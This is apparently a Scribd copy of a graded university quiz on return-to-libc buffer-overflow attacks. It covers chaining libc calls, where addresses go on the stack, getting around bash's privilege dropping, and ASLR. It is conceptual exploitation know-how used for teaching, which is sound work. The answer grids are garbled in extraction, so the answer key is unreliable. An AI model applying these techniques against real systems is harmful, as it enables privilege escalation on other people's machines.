Scribd
Upload
41 views9 pages

Advanced Buffer Overflow Techniques

Uploaded by

Hawking Charles
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
41 views9 pages

Advanced Buffer Overflow Techniques

Uploaded by

Hawking Charles
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

10/26/24, 9:11 AM Return to libc

Return to libc Tổng điểm 90/150

Email của người trả lời ([email protected]) đã được ghi lại khi họ gửi biểu mẫu này.

After using the "-z noexecstack" option to compile a C program, a buffer- 5/5
overflow attack is supposed to fail but an attacker can still make it
successful. What could be the reason?

Stack address randomization is turned off

The return address is replaced by an address of a function in libc

Stack guard protection is turned off

In the function epilogue, the previous frame pointer, which is stored in the 5/5
area below the return address, will be retrieved and assigned to the ebp
register. However, when we overflow the return address, the previous frame
pointer region is already modified, so after the function epilogue, ebp
contains some arbitrary value. Does this matter?

Yes, the program will crash when it returns to the previous function

It doesn't matter as the program will never return to the previous function

https://docs.google.com/forms/d/e/1FAIpQLSdcQMyaza6pZ4I5FuJPn4P4udqjBelLsKIMpL6bIqpgpDsQJA/viewscore?pli=1&pli=1&viewscore=AE0zAg… 1/9
10/26/24, 9:11 AM Return to libc

Instead of jumping to the system() function, we would like to jump to the execve()
function to execute "/bin/sh". Please describe how to do this. You are allowed to
have zeros in your input (assume that memcpy() is used for memory copy, instead
of strcpy() )

True False Điểm số

Find execve()
5/5
address in libc

Export a shell
variable with 5/5
"/bin/sh" content

Find "/bin/sh"
address on the 5/5
stack

Find execve()'s
frame pointer 0/5
ebp

Place pointer to
environment
5/5
variables on the
stack

Place address of
execve()'s
5/5
argument list on
the stack

Place "/bin/sh"
address on the 5/5
stack

Overwrite return
address with 5/5
execve address

Overwrite
previous frame
5/5
pointer with
execve()'s ebp

https://docs.google.com/forms/d/e/1FAIpQLSdcQMyaza6pZ4I5FuJPn4P4udqjBelLsKIMpL6bIqpgpDsQJA/viewscore?pli=1&pli=1&viewscore=AE0zAg… 2/9
10/26/24, 9:11 AM Return to libc
Câu trả lời đúng

True False

Find execve()'s frame pointer


ebp

Instead of jumping to the system() function, we would like to jump to the execve()
function to execute "/bin/sh". You are allowed to have zeros in your input (assume
that memcpy() is used for memory copy, instead of strcpy()). Assume we know
execve()'s ebp. Where on the stack to put the following addresses?

ebp-4 ebp+4 ebp+8 ebp+12 ebp+16 Điểm số

Pointer to the
list of
0/5
environment
variables

Address of
0/5
"/bin/sh"

Pointer to
execve()'s 0/5
argument list

Câu trả lời đúng

ebp-4 ebp+4 ebp+8 ebp+12 ebp+16

Pointer to the
list of
environment
variables

Address of
"/bin/sh"

Pointer to
execve()'s
argument list

https://docs.google.com/forms/d/e/1FAIpQLSdcQMyaza6pZ4I5FuJPn4P4udqjBelLsKIMpL6bIqpgpDsQJA/viewscore?pli=1&pli=1&viewscore=AE0zAg… 3/9
10/26/24, 9:11 AM Return to libc

As we know, the system() function calls /bin/sh, which is a symbolic link to


/bin/bash. Recent versions of bash will drop the privilege if it detects that the
effective user ID and the real user ID are different. Assume that we still want to use
system() in our Return-to-libc attack, please describe how you can overcome this
challenge. You are allowed to have zeros in your input (assume that memcpy() is
used for memory copy, instead of strcpy()).

True False Điểm số

Run
5/5
system("/bin/zsh")

Run
system("/bin/bash 5/5
-p")

Call setuid(0)
before running 5/5
system()

Make /bin/sh
point to /bin/zsh 0/5
before running

Câu trả lời đúng

True False

Make /bin/sh point to


/bin/zsh before running

https://docs.google.com/forms/d/e/1FAIpQLSdcQMyaza6pZ4I5FuJPn4P4udqjBelLsKIMpL6bIqpgpDsQJA/viewscore?pli=1&pli=1&viewscore=AE0zAg… 4/9
10/26/24, 9:11 AM Return to libc

When launching the return-to-libc attack, instead of jumping to the beginning of the
system() function, an attacker causes the program to jump to the first instruction
right after the function prologue in the system() function. Please describe how the
attacker should construct the input array. Function foo()'s stack frame is given
below. Where to put the following addresses?

X+100 X+104 X+108 X+132 X+136 X+140 Điểm số

system()'s
address + 0/5
3

exit()'s
0/5
address

Address of
0/5
"/bin/sh"

Câu trả lời đúng

X+100 X+104 X+108 X+132 X+136 X+140

system()'s
address + 3

https://docs.google.com/forms/d/e/1FAIpQLSdcQMyaza6pZ4I5FuJPn4P4udqjBelLsKIMpL6bIqpgpDsQJA/viewscore?pli=1&pli=1&viewscore=AE0zAg… 5/9
10/26/24, 9:11 AM Return to libc

exit()'s
exit()'s
address
address

Address of
Address of
"/bin/sh"
"/bin/sh"

Can address space layout randomization (ASLR) help defeat the return-to-libc
attack?

True False Điểm số

ASLR randomize
5/5
stack address

ASLR randomize
5/5
heap address

ASLR can defeat


brute force 0/5
attack

Câu trả lời đúng

True False

ASLR can defeat brute force


attack

https://docs.google.com/forms/d/e/1FAIpQLSdcQMyaza6pZ4I5FuJPn4P4udqjBelLsKIMpL6bIqpgpDsQJA/viewscore?pli=1&pli=1&viewscore=AE0zAg… 6/9
10/26/24, 9:11 AM Return to libc

Function foo() has a buffer overflow problem when copying your input to a buffer
that is inside its stack frame. We would like to get it to return to a sequence of
function calls: bar() ➙ bar() ➙ xyz(3, 5) ➙ exit(). Assuming we know their
addresses. Please describe how you would use the buffer overflow problem to
construct the stack before letting foo() return. You should provide a stack diagram
in your answer.

X+4 X+8 X+12 X+16 X+20 X+24 Điểm số

xyz()’s 1st
argument 0/5
=3

xyz()’s
2nd
0/5
argument
=5

1st bar()’s
5/5
addr

2nd
bar()’s 5/5
addr

xyz()'s
5/5
addr

exit()'s
addr
https://docs.google.com/forms/d/e/1FAIpQLSdcQMyaza6pZ4I5FuJPn4P4udqjBelLsKIMpL6bIqpgpDsQJA/viewscore?pli=1&pli=1&viewscore=AE0zAg… 7/9
10/26/24, 9:11 AM Return to libc
addr
exit()'s
0/5
addr

Câu trả lời đúng

X+4 X+8 X+12 X+16 X+20 X+24

xyz()’s 1st
argument =
3

xyz()’s 2nd
argument =
5

exit()'s addr

Biểu mẫu này đã được tạo ra bên trong Hanoi University of Science. Báo cáo Lạm dụng

Biểu mẫu

https://docs.google.com/forms/d/e/1FAIpQLSdcQMyaza6pZ4I5FuJPn4P4udqjBelLsKIMpL6bIqpgpDsQJA/viewscore?pli=1&pli=1&viewscore=AE0zAg… 8/9
10/26/24, 9:11 AM Return to libc

https://docs.google.com/forms/d/e/1FAIpQLSdcQMyaza6pZ4I5FuJPn4P4udqjBelLsKIMpL6bIqpgpDsQJA/viewscore?pli=1&pli=1&viewscore=AE0zAg… 9/9

You might also like